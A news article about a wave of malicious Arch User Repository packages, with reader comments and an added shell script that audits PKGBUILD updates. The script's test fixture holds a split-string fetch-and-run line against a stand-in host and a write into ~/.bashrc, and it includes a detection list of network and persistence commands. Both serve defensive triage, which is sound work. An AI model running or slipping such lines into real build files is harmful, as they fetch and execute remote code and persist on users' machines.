
The security situation with the Arch Linux AUR got a lot worse

Last updated: 14 Jun 2026 at 7:40 pm UTC

Oh dear, the situation with the Arch Linux AUR got a fair bit worse since GamingOnLinux initially covered the malicious packages.

At the time the initial article was put up, there were a bit over 400 compromised packages on the Arch User Repository (AUR). That list of affected packages (source) has since grown sharply: checking again now, nearly 2,000 are noted. That's a lot of packages to be hit like this.

Later last night the attacks were reported to be continuing "with obfuscated code", and another report in the early hours of this morning noted that they have become "a little bit more elaborate". Not all of the packaging issues are as bad as the initial wave, which tried to steal credentials; some just add ridiculous messages in Russian.

The AUR developers and maintainers are clearly going to need to rethink how the service is run. It's a wonderful idea to let anyone come along and package extra apps that are missing from the Arch Linux repositories, but anything left open in any way is going to cause problems. Especially so now in 2026, when Linux is clearly more popular than ever: anything Linux related like this is going to become a bigger target. And with AI bots too, mounting an attack like this has become far easier.

At least some level of human review is going to be needed. Otherwise, this certainly won't be the last time we see the AUR having security problems.

Article taken from GamingOnLinux.com.
About the author -
I am the owner of GamingOnLinux. After discovering Linux back in the days of Mandrake in 2003, I constantly checked on the progress of Linux until Ubuntu appeared on the scene and it helped me to really love it. You can reach me easily by emailing GamingOnLinux directly. You can follow me personally on Mastodon [External Link].
20 comments

Slaxer 12 hours ago
Uh oh.
CharlieTheMadHatter 12 hours ago
It's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!
Chrisznix 11 hours ago
Damnit, I had minitube installed, but not started it for months... fresh install with full password rotation, I guess?
mattaraxia 11 hours ago
The problem is they can't rethink it without essentially killing it.

The near complete lack of oversight and controls is basically the AUR's one feature that distinguishes it from everything else out there.

Last edited by mattaraxia on 14 Jun 2026 at 8:46 pm UTC
seflasporin 11 hours ago
Calling it "obfuscated code" is a pretty large exaggeration. They're just using string concatenation to make the text less human readable; it's not hiding what the instructions actually do. If anything this makes it more noticeable.
kerossin 11 hours ago
Quoting: CharlieTheMadHatter
It's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!
No one's going to check all the build files of every package on every update they use.
coolitic 11 hours ago
Quoting: kerossin
Quoting: CharlieTheMadHatter
It's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!
No one's going to check all the build files of every package on every update they use.
The best "solution" imo is to simply not update AUR packages often. I seldom run "paru -Syu".

Luckily for me, I have only a few (10-ish) AUR packages, and none of them seemed to have been compromised.

Last edited by coolitic on 14 Jun 2026 at 9:14 pm UTC
Sonar 11 hours ago
Quoting: Chrisznix
Damnit, i had minitube installed, but not started it for months... fresh install with full password rotation, i guess?
Did you update the package through AUR in the last few days without checking the PKGBUILD?
Sonar 11 hours ago
Quoting: kerossin
No one's going to check all the build files of every package on every update they use.
You do not have to. AUR helpers like paru will show a diff for updates which in the best case only consist of changed version numbers and hashes.

But yes, those diffs should be checked for each and every update.
tmtvl 11 hours ago
Quoting: kerossin
No one's going to check all the build files of every package on every update they use.
It's only the AUR which is compromised, not the actual Arch repositories, where the vast majority of the installed packages will come from. And if you have more than, say, half a dozen AUR packages installed; then you're doing it wrong and you should probably use something like Debian where pretty much everything you could want is available from official repos.
apocalyptech 10 hours ago
Quoting: kerossin
No one's going to check all the build files of every package on every update they use.
"No one" is too much of a stretch. I'm among the people who, yes, literally checks the contents of every PKGBUILD I've ever used (along with the contents of any bundled patches / ancillary files / etc). I've actually never used any helper apps for AUR content; I download manually, verify the contents of the PKGBUILD, verify that the package sources are set up properly, in many cases do checksum management myself, etc. Yeah, it's a lot more work, and it means that I'm constantly balancing the hassle of doing so versus Not Actually Using The Thing, but it's always struck me as the only sensible thing to do. The general community acceptance of automated AUR helpers which just blindly trust that source has always struck me as totally insane, and among the things I don't like about Arch.

Though amend "no one" to be "practically no one" and I'll agree. I'm sure people like me are in a very small minority.

Last edited by apocalyptech on 14 Jun 2026 at 9:34 pm UTC
Slaxer 9 hours ago
Quoting: coolitic
The best "solution" imo is to simply not update AUR packages often. I seldom run "paru -Syu".

Luckily for me, I have only a few (10-ish) AUR packages, and none of them seemed to have been compromised.
I got 35 from the AUR and I'm fine, nothing compromised. I think the only thing they need to do is add a really scary warning on the AUR page and perhaps on some of the AUR helpers, just to really let people know the risks they're taking by downloading anything from there without checking the PKGBUILDs.
shadowofward 8 hours ago
So what distro is safe now? Anyone know a gaming centered distro not based on Arch? I was using CachyOS but I'm ready to try anything that's fast, stable and not Arch based. Anyone??
sonic2kk 8 hours ago
Quoting: shadowofward
So what distro is safe now?
Arch is still safe, this only affects the AUR which is disabled by default on vanilla Arch at least. CachyOS should also be fine. Vanilla Arch packages are unaffected by this.
Slaxer 7 hours ago
Quoting: shadowofward
So what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??
As long as you either:
a) Didn't download anything from the AUR
or
b) Were careful if you did

You're fine. While this is pretty bad, this is honestly normal. This has happened before. If you're new to Arch, the AUR is basically the wild west, but it's also supposed to be that way. Packages in the AUR are not vetted, and you're expected to vet them on your own. Tbf, the warnings from tutorials on the internet and the Arch maintainers concerning the risks attached to the AUR aren't scary enough to let people know that by carelessly using the AUR, you will FAFO. It falls in line with Arch's DIY spirit.

If you still wanna use the AUR, here are some tips if you're uninitiated:
  • Always read the PKGBUILD script.

  • Look into who the package's maintainer is.

  • Don't autopilot your updates. Read carefully.


There's no shame in choosing not to use the AUR. You don't need it anyway.

Last edited by Slaxer on 15 Jun 2026 at 1:36 am UTC
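The checks several commenters describe (read the PKGBUILD, treat a helper's update diff as a red flag when it changes anything beyond version numbers and hashes, and notice split-string tricks such as the string concatenation seflasporin mentions) can be partly automated. The script below is an added example for this page, not code from the article, from paru or from makepkg, and the two PKGBUILDs it audits are constructed for the example rather than taken from the incident. It shows a plain version bump passing both checks and a tampered update failing them; every pattern in it is a heuristic, so a hit means "read it by hand" and a clean result does not mean safe.

```shell
#!/bin/sh
# Added example (not from the article, paru, yay or makepkg): a minimal audit of an
# AUR PKGBUILD update, in the spirit of "read the diff on every update".
#   pkgbuild_diff_is_routine OLD NEW  succeeds only when every changed line is a
#       pkgver/pkgrel/checksum bump, the kind of diff a helper shows for a boring update.
#   pkgbuild_risky_hits FILE          prints the number of non-comment lines using
#       constructs a packaging bump never needs (build-time network fetch, decoders,
#       shell-rc or autostart writes, "cu""rl"-style split strings) and lists them on stderr.
# Both are heuristics: a hit means "read it by hand"; a clean result does not mean safe.

# Lines a plain version bump may touch: pkgver, pkgrel, checksum arrays, the quoted hex
# (or SKIP) entries of a multi-line checksum array, and blank lines.
ROUTINE_LINE="^[[:space:]]*(pkgver|pkgrel|(md5|sha1|sha256|sha512|b2)sums(_[a-z0-9_]+)?)=|^[[:space:]]*'([0-9A-Fa-f]+|SKIP)'[[:space:]]*\)?[[:space:]]*\$|^[[:space:]]*\$"

# Constructs that have no business appearing in a routine update (a maintainer-chosen list,
# not a published ruleset; extend it for your own threat model).
RISKY="curl |wget |base64|openssl enc|eval |/dev/tcp|\.bashrc|\.bash_profile|\.profile|\.zshrc|\.config/autostart|systemd/user|crontab|[A-Za-z]\"\"[A-Za-z]|[A-Za-z]''[A-Za-z]"

pkgbuild_diff_is_routine() {
  # Keep the added/removed lines of a unified diff (minus the file headers), strip the
  # +/- marker, and fail if any remaining line is not a version, checksum or blank line.
  if diff -u "$1" "$2" | grep -E '^[-+]' | grep -vE '^(---|\+\+\+)' \
       | sed 's/^[-+]//' | grep -vqE "$ROUTINE_LINE"; then
    return 1
  fi
  return 0
}

pkgbuild_risky_hits() {
  # Count non-comment lines matching RISKY; echo the count, print the lines to stderr.
  hits=$(grep -nE "$RISKY" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true)
  if [ -n "$hits" ]; then
    printf '%s\n' "$hits" >&2
    printf '%s\n' "$hits" | wc -l | tr -d ' '
  else
    echo 0
  fi
}

audit() {
  # Returns 0 only when OLD -> NEW is a routine bump and NEW has no risky hits.
  pkgbuild_diff_is_routine "$1" "$2" && [ "$(pkgbuild_risky_hits "$2")" -eq 0 ]
}

# --- Constructed sample data (not real AUR packages) ---------------------------------
WORK=$(mktemp -d)
cat > "$WORK/PKGBUILD.old" <<'EOF'
# Maintainer: example maintainer (constructed sample)
pkgname=example-app
pkgver=1.2.0
pkgrel=1
pkgdesc="Example application (constructed for this audit example)"
arch=('x86_64')
url="https://example.invalid/example-app"
license=('MIT')
source=("$url/archive/v$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF

# Routine update: only the version and the checksum change.
sed -e 's/^pkgver=.*/pkgver=1.2.1/' \
    -e "s/^sha256sums=.*/sha256sums=('1111111111111111111111111111111111111111111111111111111111111111')/" \
    "$WORK/PKGBUILD.old" > "$WORK/PKGBUILD.routine"

# Tampered update: the same bump plus a build-time fetch hidden behind split strings and
# a write into the user's shell rc (constructed; not the code from the actual incident).
{
  cat "$WORK/PKGBUILD.routine"
  cat <<'EOF'

prepare() {
  "cu""rl" -fsSL "https://example.invalid/x" | sh
  echo 'source ~/.cache/.x' >> "$HOME/.bashrc"
}
EOF
} > "$WORK/PKGBUILD.suspicious"

if audit "$WORK/PKGBUILD.old" "$WORK/PKGBUILD.routine"; then
  echo "routine: plain version bump, nothing beyond pkgver and checksums changed"
fi
if ! audit "$WORK/PKGBUILD.old" "$WORK/PKGBUILD.suspicious"; then
  echo "suspicious: non-routine changes, read the PKGBUILD before building"
fi
```

Pointing the two functions at the `PKGBUILD` files a helper has already cloned (paru and yay keep them under the user's cache directory, and makepkg reads the one in the current directory) gives a quick triage step before the diff is read by hand; it does not replace reading it.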
dibz 6 hours ago
Quoting: shadowofward
So what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??
The real answer is for people to get over the idea of rolling distros, they've always been dangerous like this, and always will be. Most people don't actually need the latest and greatest, or only need very specific things that are. It's mostly a mindset. Frankly most of the time the dependencies on latest packages don't come from need at all, it comes from that being what was the latest when the developer started their project.

In the professional world things like immutable distros and verified images and such are coming full circle to "solve" this problem that never used to exist used to be a niche crowd. Or you know, flatpaks, snaps, appimages, pick one - they're all solutions to the same issue.

Last edited by dibz on 15 Jun 2026 at 1:26 am UTC
Jarmer 6 hours ago
Wow this is bad, and yeah I agree with @mattaraxia ... how COULD they rethink it? Honestly, when arch had a small installbase and linux had such a small usergroup, it was fine to have wild west places like the aur. Nowadays? Not so much.

I hate to say this, but ... might be time for aur to gracefully say goodnight. It had a good run (it really did!) but in its current form there's no way this kind of stuff doesn't continue just even worse and even faster.

I checked, and I do have two applications from the AUR:
cider
anydesk
... and it looks like both are now avail as flats! So I will promptly move these two off of aur into flatpak and never look back at aur again.
Jarmer 6 hours ago
Quoting: dibz
Quoting: shadowofward
So what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??
The real answer is for people to get over the idea of rolling distros, they've always been dangerous like this, and always will be.
ummmmm excuse me what on earth?

I'm not sure, so I just have to ask: do you understand what we are even talking about here? This has nothing to do whatsoever with the distro itself, or whether it's rolling or not rolling. Rolling distros are 100% not "always dangerous"; that's the most preposterous thing I've ever heard.
Chrisznix 2 hours ago
Quoting: Sonar
Did you update the package through AUR in the last few days without checking the PKGBUILD?
No, I think I did not! Have to check after work to be sure about it. Thank you, friend! :)
Adutchman 1 hour ago
Quoting: CharlieTheMadHatter
It's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!
Aside from the discussion about whether people actually do that, can the average joe actually read a PKGBUILD file and determine whether it is safe?

Also, I understand that this has been the attitude in the Arch/DIY community, but with so many packages being compromised, this is a system failing, and that's not the user's fault. There are many security measures from the package manager and programming language package manager world that can (and should) be applied, like mandatory 2FA, package signing/trusted publisher, cooldown periods, a trust system (if package has less than installs, show a warning), etc. Loads of these can be implemented without changing the character of the AUR.

Last edited by Adutchman on 15 Jun 2026 at 6:33 am UTC